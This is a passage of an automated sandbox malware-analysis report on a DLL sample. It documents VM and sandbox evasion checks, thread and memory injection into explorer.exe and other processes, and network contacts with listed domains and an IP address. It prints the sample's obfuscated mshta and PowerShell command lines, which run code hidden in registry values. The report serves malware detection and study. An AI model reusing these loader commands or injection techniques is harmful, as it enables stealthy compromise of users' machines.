                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RuntimeBroker.exe, 0000002D.00000000.502166854.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513265661.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495786789.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.526561852.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.490570180.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.507573940.000001FFC2000000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532262658.000001FFC2000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLL5
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6733
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2704
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
                      Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft
                      Source: explorer.exe, 0000001B.00000000.408453384.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                      Source: RuntimeBroker.exe, 00000031.00000000.538603337.0000018280A54000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 2E09.bin.27.drBinary or memory string: gencounter Microsoft Hyper-V Gene Kernel
                      Source: 2E09.bin.27.drBinary or memory string: vmgid Microsoft Hyper-V Gues Kernel
                      Source: 2E09.bin.27.drBinary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
                      Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: 2E09.bin.27.drBinary or memory string: vpci Microsoft Hyper-V Virt Kernel
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: 2E09.bin.27.drBinary or memory string: storflt Microsoft Hyper-V Stor Kernel
                      Source: mshta.exe, 00000013.00000002.342969322.00000162CE011000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: 2E09.bin1.48.dr, 2E09.bin.27.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002D.00000000.507758371.000001FFC2056000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
                      Source: explorer.exe, 0000001B.00000000.410736983.0000000005138000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06278FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Source: C:\Windows\explorer.exeDomain query: gamexperts.net
                      Source: C:\Windows\explorer.exeDomain query: cabrioxmdes.at
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2740000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 15723670000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 5D0000
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 360000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2760000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35E000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2740000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 15723670000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 418792000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFC48D0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 491CC81000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18282B30000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 360000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2760000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35E000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 2740000 value: 80
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 7000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 5180
                      Source: C:\Windows\explorer.exeThread register set: target process: 4440
                      Source: C:\Windows\explorer.exeThread register set: target process: 4724
                      Source: C:\Windows\explorer.exeThread register set: target process: 4960
                      Source: C:\Windows\explorer.exeThread register set: target process: 3700
                      Source: C:\Windows\explorer.exeThread register set: target process: 6604
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
